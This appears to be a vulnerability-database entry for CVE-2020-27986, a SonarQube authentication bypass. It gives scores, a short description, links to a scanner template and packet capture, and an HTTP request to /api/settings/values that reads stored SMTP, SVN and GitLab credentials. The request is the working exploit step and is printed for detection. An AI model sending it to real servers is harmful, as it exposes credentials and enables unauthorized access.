🔙 목록으로 돌아가기

CVE-2020-27986: SonarQube - Authentication Bypass

TitleSonarQube - Authentication Bypass
Authorpikpikcu
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to sensitive information.
RemediationReportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
CVSS Score7.5
EPSS Score0.92573
CVE IDCVE-2020-27986
CWE IDCWE-306
Tags cve cve2020 sonarqube sonarsource vkev vuln

🔍 Vulnerability Description

SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.

🌐 HTTP Request

GET /api/settings/values HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-27986.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-27986.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A